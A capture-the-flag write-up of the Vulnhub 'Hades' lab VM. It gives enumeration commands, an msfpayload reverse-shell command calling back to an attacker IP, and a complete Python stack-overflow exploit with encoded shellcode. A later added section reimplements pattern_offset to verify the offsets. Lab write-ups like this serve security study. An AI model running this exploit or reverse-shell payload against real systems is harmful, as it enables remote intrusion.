Aerosol, posted December 27, 2014

About a month ago, Vulnhub released a boot2root image built by Lok_Sigma called Hades. The box promised to be full of annoyances and it delivered them in droves. Requiring a combination of exploit development, reverse engineering and some out-of-the-box thinking, I really enjoyed this challenge. I decided to share my solution now that the competition is over. It goes without saying this post has a lot of SPOILERS!

Big thanks go out to the Vulnhub team for the awesome work they do. Follow them on Twitter to keep up with the latest releases.

If you want to tackle Hades yourself, you can grab a copy of the machine here.

Enjoy

Commands Used

# Host Discovery
netdiscover -r 10.0.0.0/24

# Service Enumeration
nmap -v -sS -T4 -n -p- 10.0.0.129 && us -mU -v -p 1-65535 10.0.0.129

# Base64 Decryption
base64 -d ssh-hades > hades.bin

# Pattern Creation
/opt/metasploit-framework/tools/pattern_create 1000

# Offset Search
/opt/metasploit-framework/tools/pattern_offset.rb Af7A
/opt/metasploit-framework/tools/pattern_offset.rb 5Af6
/opt/metasploit-framework/tools/pattern_offset.rb 0x34654133

# Finding Assembly Shellcode
/opt/metasploit-framework/tools/metasm_shell.rb
metasm> jmp $esp+80

# Reverse Shell Payload (bad-character list quoted so the shell passes the backslashes through)
msfpayload linux/x86/shell_reverse_tcp LHOST=10.0.0.130 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -t python

# Improved Shell
python -c "import pty; pty.spawn('/bin/sh')"

# File Decryption
openssl enc -d -aes-256-cbc -in flag.txt.enc -out flag.txt -pass file:key_file

Finished Exploit – Hades

#!/usr/bin/env python
# Python 2 script: string literals are byte strings

import socket, struct

target = '10.0.0.129'
port = 65535

# Shellcode
# msfpayload linux/x86/shell_reverse_tcp LHOST=10.0.0.130 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -t python
# [*] x86/shikata_ga_nai succeeded with size 95 (iteration=1)
buf = ""
buf += "\xda\xc7\xd9\x74\x24\xf4\x5d\xba\xc4\xe0\xc2\x40\x2b"
buf += "\xc9\xb1\x12\x83\xed\xfc\x31\x55\x13\x03\x91\xf3\x20"
buf += "\xb5\x28\x2f\x53\xd5\x19\x8c\xcf\x70\x9f\x9b\x11\x34"
buf += "\xf9\x56\x51\xa6\x5c\xd9\x6d\x04\xde\x50\xeb\x6f\xb6"
buf += "\x68\x0b\x90\xc4\x05\x09\x90\xd9\x89\x84\x71\x69\x57"
buf += "\xc7\x20\xda\x2b\xe4\x4b\x3d\x86\x6b\x19\xd5\x36\x43"
buf += "\xed\x4d\x21\xb4\x73\xe4\xdf\x43\x90\xa4\x4c\xdd\xb6"
buf += "\xf8\x78\x10\xb8"

# Buffer
# Cyclic pattern from "pattern_create 1000", used to find the offsets below
#buffer = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B'
buffer = '\x90'*11                      # NOP sled, offset 0
buffer += buf                           # 95-byte shellcode, offset 11
buffer += '\x90'*(131-95-11)            # NOP padding up to offset 131
buffer += '\xeb\x4e\x90\x90'            # esp - 0x2c (offset 131)
buffer += 'F'*(167-4-131)               # filler up to offset 167
buffer += 'B'*4                         # ebp (offset 167)
buffer += struct.pack("<L",0x08048694)  # eip (offset 171)
buffer += 'D'*(1000-4-4-167)            # pad the request out to 1000 bytes

# Connect and send payload
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.send(buffer)
data = s.recv(1024)
s.close()
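The three pattern_offset lookups in the Commands Used section are the crash-triage step that turns a register or stack value seen in the debugger into a byte offset inside the 1000-byte cyclic pattern. The following Python 3 script is an added example that reimplements what Metasploit's pattern_create and pattern_offset do, so the offsets the write-up relies on (171 for EIP, 167 for EBP, 131 for the slot the exploit labels "esp - 0x2c") can be checked without the Metasploit tools; it is not code from the post or from Metasploit, and the function names pattern_create, pattern_offset and triage_crash are this example's own.

```python
import string
import struct


def pattern_create(length):
    """Build a Metasploit-style cyclic pattern of Upper/lower/digit triples
    ("Aa0Aa1Aa2...").  Every 4-byte window is unique within the first 20280
    bytes, which is what makes a crash value map to exactly one offset."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if 3 * len(chunks) >= length:
                    return "".join(chunks)[:length]
    raise ValueError("length exceeds the 20280-byte pattern space")


def pattern_offset(query, length=1000):
    """Return the byte offset of `query` inside pattern_create(length), or -1.

    `query` is either a literal 4-character substring ("Af7A") or a
    0x-prefixed 32-bit value copied from a register or stack dump
    (0x34654133).  A hex value is converted back to the little-endian byte
    order in which it sat in memory before it is searched for, which is
    why 0x34654133 resolves to the substring "3Ae4"."""
    if query.lower().startswith("0x"):
        needle = struct.pack("<I", int(query, 16)).decode("ascii")
    else:
        needle = query
    return pattern_create(length).find(needle)


def triage_crash(length=1000):
    """The three lookups from the write-up, keyed by the slot each one
    identifies in the exploit's buffer layout."""
    return {
        "eip": pattern_offset("Af7A", length),
        "ebp": pattern_offset("5Af6", length),
        "esp-0x2c": pattern_offset("0x34654133", length),
    }


if __name__ == "__main__":
    for name, offset in triage_crash().items():
        print("%-9s offset %d" % (name, offset))
```

The returned offsets agree with the arithmetic in the finished exploit: 11 NOPs + 95 bytes of shellcode + 25 NOPs fill the first 131 bytes, the 4-byte "esp - 0x2c" slot and 32 filler bytes bring the total to 167, the saved EBP occupies 167 to 170, and the overwritten return address lands at 171. A lookup that returns -1 means the value in the register was not taken from the pattern at all, which is the usual sign that the crash corrupted something other than a straight copy of the input.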